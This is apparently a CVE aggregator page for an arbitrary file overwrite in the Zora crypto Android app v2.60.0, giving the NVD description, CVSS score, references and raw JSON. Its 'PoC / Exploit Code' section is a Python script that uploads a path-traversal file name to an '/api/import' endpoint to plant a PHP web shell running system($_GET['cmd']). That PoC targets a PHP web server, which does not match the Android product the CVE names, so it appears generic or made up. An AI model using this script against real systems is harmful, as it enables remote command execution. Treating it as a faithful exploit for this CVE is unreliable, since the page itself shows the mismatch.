CVE-2026-30285

Description

An arbitrary file overwrite vulnerability in Zora: Post, Trade, Earn Crypto v2.60.0 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:zora:zora:2.60.0:*:*:*:*:android:*:* - VULNERABLE

Zora: Post, Trade, Earn Crypto v2.60.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_arbitrary_overwrite(target_url, file_path, malicious_content):
    """
    Exploit for CVE-2026-30285: Arbitrary File Overwrite
    This script attempts to overwrite a critical file on the target server.
    """
    upload_endpoint = f"{target_url}/api/import"
    
    # Construct payload to overwrite a specific file (e.g., a config or script)
    # Using path traversal if necessary based on application behavior
    files = {
        'file': (file_path, malicious_content, 'application/octet-stream')
    }
    
    try:
        response = requests.post(upload_endpoint, files=files, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully. Check if {file_path} was overwritten.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080"
    # Example: Overwriting a critical configuration file
    target_file = "../../../var/www/html/config.php" 
    payload = "<?php echo 'pwned'; system($_GET['cmd']); ?>"
    exploit_arbitrary_overwrite(target, target_file, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30285
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30285
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30285/
[4] VulDB https://vuldb.com/cve/CVE-2026-30285
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/15
[6] https://secsys.fudan.edu.cn/
[7] https://zora.co/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30285", "sourceIdentifier": "[email protected]", "published": "2026-03-31T20:16:26.550", "lastModified": "2026-04-07T16:11:37.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Zora: Post, Trade, Earn Crypto v2.60.0 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zora:zora:2.60.0:*:*:*:*:android:*:*", "matchCriteriaId": "EDA2FE6E-4F49-4855-BE21-D0E305688F64"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/15", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://zora.co/", "source": "[email protected]", "tags": ["Product"]}]}}